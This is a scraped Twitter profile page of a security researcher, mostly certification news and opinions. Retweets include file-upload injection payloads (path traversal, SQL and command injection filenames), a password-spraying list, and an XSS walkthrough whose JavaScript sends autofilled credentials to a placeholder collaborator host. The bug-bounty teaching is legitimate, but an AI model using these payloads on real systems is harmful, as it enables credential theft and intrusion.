Ansh Bhawnani

870 posts

Ansh Bhawnani

Ansh Bhawnani

@techhacker98

Information Security Researcher and a student.

Bhilai, India Katılım Mayıs 2015
83 Takip Edilen9.7K Takipçiler
Sabitlenmiş Tweet
Ansh Bhawnani
Ansh Bhawnani@techhacker98·
This one was really tough, but exciting and I loved solving the challenges. Diving deep into the web, reviewing 1000s of lines of code, chaining exploits and fully automating them, this was a wonderful ride. Thank you @offsectraining for an expert level course 🙌 #oswe #infosec
Ansh Bhawnani tweet media
English
25
13
252
17.6K
Ansh Bhawnani retweetledi
Recon 2K26
Recon 2K26@Recon2k26·
🚨 KEYNOTE SPEAKER REVEAL 🚨 Welcome to RECON 2K26, @techhacker98 , we're SO ready for this one! 🔥 Ansh Bhawanani is a Senior Security Analyst at @Hacker0x01 , an OSCE3-certified app security specialist, a hands-on vulnerability researcher, AND the content creator breaking down offensive security for the masses on YouTube. The guy makes the hardest concepts feel learnable💥 His keynote? Buckle up: 🎯 "Execution Hijacking: Breaking Windows Trust Boundaries" Windows internals, trust abuse, real-world exploitation, this is going to be an absolute masterclass. Stay locked in for more drops:))) #RECON2K26 #CyberSecurity #ethicalhacking #offensivesecurity #redteam #bittentech
Recon 2K26 tweet media
English
0
3
5
242
Ansh Bhawnani
Ansh Bhawnani@techhacker98·
Most people think developers ignore security, but what they really ignore is friction. In AppSec we are always taught to keep a balance between compliance and delivery. Finding a critical cannot necessarily block a release. For the stakeholders, business velocity > security.
English
1
0
7
283
Ansh Bhawnani retweetledi
OffSec
OffSec@offsectraining·
Congratulations, Ansh Bhawnani! 🦊👏 To continue with our Try Harder monthly series, we're celebrating dedicated individuals who embody the spirit of #TryHarder. This month, we’re recognizing Ansh, who just passed OffSec's OSED exam, completing the OSCE³ trio (OSED, OSEP, OSWE) 🪙 "This was about pushing myself to the limit, through fear, doubt and everything unknown. Thank you to OffSec for an awesome course and a breathtaking exam." 💪 Want to be OffSec's next #TryHarder hero? Tag us in your success story to be considered for a feature 🏷️
OffSec tweet mediaOffSec tweet mediaOffSec tweet mediaOffSec tweet media
English
3
7
72
8.5K
Ansh Bhawnani
Ansh Bhawnani@techhacker98·
The same people concerned about their privacies are happily posting their artistic photos all over the internet. I mean the evolution is great and exciting but the right way to do it is not to train those public AI models with your personal stuff.
English
4
6
31
1.7K
Ansh Bhawnani retweetledi
Evan Luthra
Evan Luthra@EvanLuthra·
#RatanTata is the World's Biggest Donor. He has donated ₹829,734 crore. Built multiple free hospitals, schools & saved millions of lives. Today, on his death, the whole world is crying. Some unheard instances of Mr. Tata that will make you cry: 🧵
Evan Luthra tweet media
English
624
15.5K
112.2K
6M
Ansh Bhawnani
Ansh Bhawnani@techhacker98·
1500 flights cancelled, 1000s of patients shifted from emergency services, banking services down, we've hit a Blue Screen of Chaos.
English
0
0
6
1.2K
Ansh Bhawnani retweetledi
PentesterLab
PentesterLab@PentesterLab·
Five activities every web hacker should do at least once: 1. Read the source code of an HTTP request parser 2. Write a small web application with registration, authentication, file upload... 3. Read an RFC 4. Participate in a Capture The Flag competition. 5. Fix a vulnerability in an open-source project.
English
1
56
236
24.4K
Ansh Bhawnani retweetledi
NCIIPC India
NCIIPC India@NCIIPC·
#NCIIPC is looking for expert pen-testers, security researchers and ethical hackers to secure nation's CIIs. Join NCIIPC scheme for Crowdsourcing of Pen Testing of CIIs.
NCIIPC India tweet media
English
8
69
187
20.3K
Ansh Bhawnani retweetledi
Matt Johansen
Matt Johansen@mattjay·
The Okta hack that keeps on giving! Cloudflare announced a new data breach today in it's continued battle against creds stolen during a previous Okta hack Let's dig in:
English
20
313
1.9K
393K
Ansh Bhawnani retweetledi
NAMESPACE
NAMESPACE@namespaceworld·
Enhance your understanding of Cyber Security with Ansh Bhawnani, Application Security Engineer at ICE! 🌐🔒 🗓️ Date: 26 January '24 🕕 Time: 6 pm 👤 Speaker: Ansh Bhawnani 🔗 Register now: namespacecomm.in/techx
NAMESPACE tweet media
English
1
5
20
1.5K
Ansh Bhawnani retweetledi
VAIDIK PANDYA
VAIDIK PANDYA@h4x0r_fr34k·
Daily Notes : Day 79 File Upload Escalation: 1. Set filename to ../../../tmp/lol.png and try to achieve a path traversal 2. Set filename to sleep(10)-- -.jpg and you may be able to achieve a SQL injection 3. Set filename to to achieve a XSS 4. Set filename to ; sleep 10; to test some command injection (book.hacktricks.xyz/pentesting-web…) 5. ⁠JS file upload + XSS (#xss-abusing-service-workers" target="_blank" rel="nofollow noopener">book.hacktricks.xyz/pentesting-web…) 6. ⁠ you can indicate the web server to catch an image from a URL you could try to abuse a SSRF. If this image is going to be saved in some public site, you could also indicate a URL from iplogger.org/invisible/ and steal information of every visitor. Reference: hacktricks
English
5
68
218
15.4K
Ansh Bhawnani retweetledi
spencer
spencer@techspence·
The new year is almost here, don’t forget to add the following to your password cracking/spraying lists: Spring2024 Spring2024! Summer2024 Summer2024! Winter2024 Winter2024! Fall2024 Fall2024! Password2024 Password2024! Companyname2024 Companyname2024!
English
38
255
1.6K
253K
Ansh Bhawnani
Ansh Bhawnani@techhacker98·
This one was really tough, but exciting and I loved solving the challenges. Diving deep into the web, reviewing 1000s of lines of code, chaining exploits and fully automating them, this was a wonderful ride. Thank you @offsectraining for an expert level course 🙌 #oswe #infosec
Ansh Bhawnani tweet media
English
25
13
252
17.6K
Ansh Bhawnani retweetledi
Luke Stephens (hakluke)
Someone just sent me an XSS to collaborate on. It was an interesting case so I thought I'd tweet about it. They'd found an xss in auth.example.com, which was a subdomain that is only used to authenticate users. They were having trouble escalating the XSS because this subdomain has no access to the main application at app.example.com, or the API it interacts with, which is at api.example.com. I immediately thought of something that I'd heard recently (maybe on @ctbbpodcast?) where you can use an XSS to steal auto-filled plaintext credentials, so I thought I'd try to replicate this. First, injected a fake login form, like this:
This is good enough to have a password manager automatically fill the credentials if it is injected into any page on the correct domain. Now we just needed to send the credentials to the attacker server, I wrote some basic JS to do this: setTimeout(function(){ httpRequest = new XMLHttpRequest(); httpRequest.open('GET', 'https://BURP_COLLABORATOR?'+document.getElementById("email").value+"="+document.getElementById("password").value); httpRequest.send();},2000) The timeout is required because it takes a while for the password manager to autofill the passwords. Then I used the XSS to inject the form, and the JavaScript, and voila! Plaintext credentials. This isn't a new technique, I can see there are a bunch of other articles about it - but it's the first time I've exploited an XSS to steal creds from a password manager like this, so I figured some others would find it interesting.
English
13
101
426
40.3K